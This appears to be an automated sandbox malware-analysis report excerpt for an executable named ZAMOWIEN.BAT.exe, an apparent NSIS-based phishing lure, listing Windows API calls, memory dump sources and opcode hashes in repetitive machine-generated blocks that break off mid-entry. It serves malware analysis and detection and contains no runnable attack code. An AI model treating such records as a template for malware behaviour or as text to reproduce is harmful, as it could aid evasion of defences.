                                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 334405425-0
                                                                                  • Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                                  • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                                                                  • Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                                                                  • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00742098), ref: 00401BE7
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree
                                                                                  • String ID: Call
                                                                                  • API String ID: 3394109436-1824292864
                                                                                  • Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                                  • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                                                                  • Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                                                                  • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(00000000), ref: 70502B33
                                                                                  • GetLastError.KERNEL32 ref: 70502C3A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 1214770103-0
                                                                                  • Opcode ID: d40c89e007eb3c699c664b674b111c13e20d4f6bdc8606be8be3dc2b7b4136d9
                                                                                  • Instruction ID: 2931e315aa4c50ed95c907657fba30eb90cf5ef640e51aa203bc5338b578f169
                                                                                  • Opcode Fuzzy Hash: d40c89e007eb3c699c664b674b111c13e20d4f6bdc8606be8be3dc2b7b4136d9
                                                                                  • Instruction Fuzzy Hash: CD516FB2604244DFDB21EF75DC9AB5D3F79EB94314F20442AE905DB260DAB8A880CF51
                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                                  • Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
                                                                                  • Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                                                                  • Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A
                                                                                  APIs
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405C12
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                                                    • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                                                                  • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420,00000000), ref: 00405CBA
                                                                                  • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420), ref: 00405CCA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3248276644-0
                                                                                  • Opcode ID: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                                  • Instruction ID: 2026245c43f0ab98faeafd35ab7c4279b053bc85bc29d2cdff443752a8830806
                                                                                  • Opcode Fuzzy Hash: 28137d2b7c79da387a19cc910a57ce3f03d1b4ac0c29095b07e0900cb30f0510
                                                                                  • Instruction Fuzzy Hash: 54F0F436109F511AF62233361D09EAF1648CE82328B5A057FF952B26D1CA3C89039CBE
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                  • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                                  • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                                  • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2547128583-0
                                                                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                  • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                  • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                  • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                  • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointerwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327478801-0
                                                                                  • Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                                  • Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
                                                                                  • Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                                  • Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E
                                                                                  APIs
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWrite
                                                                                  • String ID:
                                                                                  • API String ID: 390214022-0
                                                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                  • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                  • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
